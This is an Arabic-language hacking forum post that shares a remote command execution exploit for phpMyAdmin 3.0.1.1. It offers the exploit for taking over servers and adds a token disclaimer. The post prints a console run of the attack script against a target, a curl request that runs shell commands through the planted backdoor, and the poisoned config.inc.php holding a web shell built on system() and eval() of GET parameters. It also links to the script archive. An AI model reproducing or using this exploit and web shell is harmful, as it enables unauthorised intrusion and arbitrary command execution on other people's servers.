:: vBspiders Professional Network :: - phpMyAdmin ريموت كومند !! PoC

الســـــلام عليكم شباب ...

http://farm4.static.flickr.com/3287/...ecc214.jpg?v=0

ظهرت ثغره قوية البارحة للPhpMyAdmin بلميل وورم مع انه صعب وجود اي ثغره فعاله كPoC/exploit لبرنامج مفتوح المصدر وشهير جدا ك PhpMyAdmin .

والجميل بلثغره انه مازالت امكانية وجود ثغرات ريموت كومند ( remote command execution ) او هيب اوفر فلو ( heap overflow ) او حتى سيكيول انجكشن ك ( xp_cmdshell - cmd - etc ) .

وطبعا حصريا لشباب منتدى سيكيورتي رولز وصلني البارحة من صديق عزيز ريموت كومند للثغره بحيث نقدر من خلال الشل كود هذا نقوم بإختراق السيرفر ( نبرء ذمتي وذمة الشباب من اي عملية اختراق عربية )

كود PHP:

./SEC-R1Z_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __ / /_ _ _ _ / _ _\/ _ _ /\ \< |/_ _ _ _ / \_ _ _ _/ /_ _ / / __ | () / | | / / \_ _ _ _/ /_ _ / / |__|| / | | / / _ _ _ _\ \_ _ \ \2_0_0_9 | \ | | / /_ _ /_ _ _ _ _\ _ _ _/\ _ _ _ / |__|\ __\ |__|/_ ./J0_ _\_ [b0x@r1z ~]./phpMyAdmin-sec-r1z.sh usage: ./phpMyAdmin-sec-r1z.sh i.e.: ./phpMyAdmin-sec-r1z.sh http://target.tld/phpMyAdmin/ [b0x@r1z ~]./phpMyAdmin-sec-r1z.sh http://172.16.211.10/phpMyAdmin-3.0.1.1/ [+] checking if phpMyAdmin exists on URL provided ... [+] phpMyAdmin ****** and form token received successfully. Good! [+] attempting to inject phpinfo() ... [+] success! phpinfo() injected successfully! output saved on /tmp/phpMyAdmin-sec-r1z.sh.9217.phpinfo.r1z.html [+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.: http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/ http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?p=phpinfo(); please send any feedback/improvements for this script to unknown.pentestergmail.com [b0x@r1z ~]curl "http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/" total 96 drwxr-xr-x 2 root root 4096 Mar 11 10:12 bin drwxr-xr-x 3 root root 4096 May 6 10:01 boot drwxr-xr-x 15 root root 14300 Jun 5 09:02 dev drwxr-xr-x 147 root root 12288 Jun 5 09:02 etc drwxr-xr-x 3 root root 4096 Oct 18 2008 home drwxr-xr-x 2 root root 4096 Jul 2 2008 r1z

طبعا السكربت مو برمجتي وماله علاقه بمنتدانا ! فقط للتنويه

اللحين بعد تشغيل السكربت لل

كود PHP:

/config/config.inc.php

تم حقن الايفل كود حقنا ( السورس كود )

كود PHP:

<?php /* * Generated configuration file * Generated by: phpMyAdmin 3.0.1.1 setup script by Michal Čihař <michal@cihar.com> * Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $ * Date: Tue, 09 Jun 2009 14:13:34 GMT */ /* Servers configuration */ $i = 0; /* Server (config:root) [1] */ $i++; $cfg['Servers'][$i]['host']=''; if($_GET['c']){echo '<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo '<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost'; $cfg['Servers'][$i]['extension'] = 'mysqli'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root'; /* End of servers configuration */ ?>

باسوورد الباش سكربت
www.sec-r1z.com

http://www.youtube.com/watch?v=-t5xWuCYhlw

رابط الفيديو مضغوط اول شي rar ومن ثم zip لاجل حجمه بلتحميل ...

كود PHP:

http://rapidshare.com/files/243217562/_sec-r1z.com.zip

تحياتي .

يرجى ذكر المصدر عند النقل
SecurityRules
www.sec-r1z.com

منقووول